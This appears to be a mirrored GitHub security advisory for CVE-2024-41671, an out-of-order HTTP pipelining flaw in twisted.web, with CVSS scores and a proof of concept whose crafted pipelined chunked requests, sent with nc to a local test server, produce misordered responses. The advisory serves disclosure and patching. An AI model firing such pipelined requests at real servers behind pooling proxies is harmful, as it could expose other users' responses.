Lucene search

GitHub Advisory DatabaseGHSA-C8M8-J448-XJX7

HistoryJul 29, 2024 - 4:33 p.m.

twisted.web has disordered HTTP pipeline response

2024-07-2916:33:11

CWE-444

GitHub Advisory Database

github.com

twisted library

http server

out-of-order processing

information disclosure

reverse proxies

connection pooling

CVSS3

8.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

AI Score

7.1

Confidence

Low

EPSS

Percentile

16.2%

JSON

Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

PoC

Start a fresh Debian container:

docker run --workdir /repro --rm -it debian:bookworm-slim

Install twisted and its dependencies:

apt -y update && apt -y install ncat git python3 python3-pip \
    && git clone --recurse-submodules https://github.com/twisted/twisted \
    && cd twisted \
    && pip3 install --break-system-packages .

Run a twisted.web HTTP server that echos received requests’ methods. e.g., the following:

from twisted.web import server, resource
from twisted.internet import reactor

class TheResource(resource.Resource):
    isLeaf = True

    def render_GET(self, request) -&gt; bytes:
        return b"GET"

    def render_POST(self, request) -&gt; bytes:
        return b"POST"

site = server.Site(TheResource())
reactor.listenTCP(80, site)
reactor.run()

Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:

(printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80

Observe that the responses arrive out of order:

HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:41 GMT
Content-Length: 5
Content-Type: text/html

POST
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 4
Content-Type: text/html

GET
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 5
Content-Type: text/html

POST

Impact

See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

Affected configurations

Vulners

Node

twistedtwistedRange≤24.3.0

VendorProductVersionCPE
twistedtwisted*cpe:2.3:a:twisted:twisted:*:*:*:*:*:*:*:*

Vendor	Product	Version	CPE
twisted	twisted	*	cpe:2.3:a:twisted:twisted::::::::

References

github.com/advisories/GHSA-c8m8-j448-xjx7

github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33

github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc

github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7

nvd.nist.gov/vuln/detail/CVE-2024-41671

CVSS3

8.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

AI Score

7.1

Confidence

Low

EPSS

Percentile

16.2%

JSON

Related for GHSA-C8M8-J448-XJX7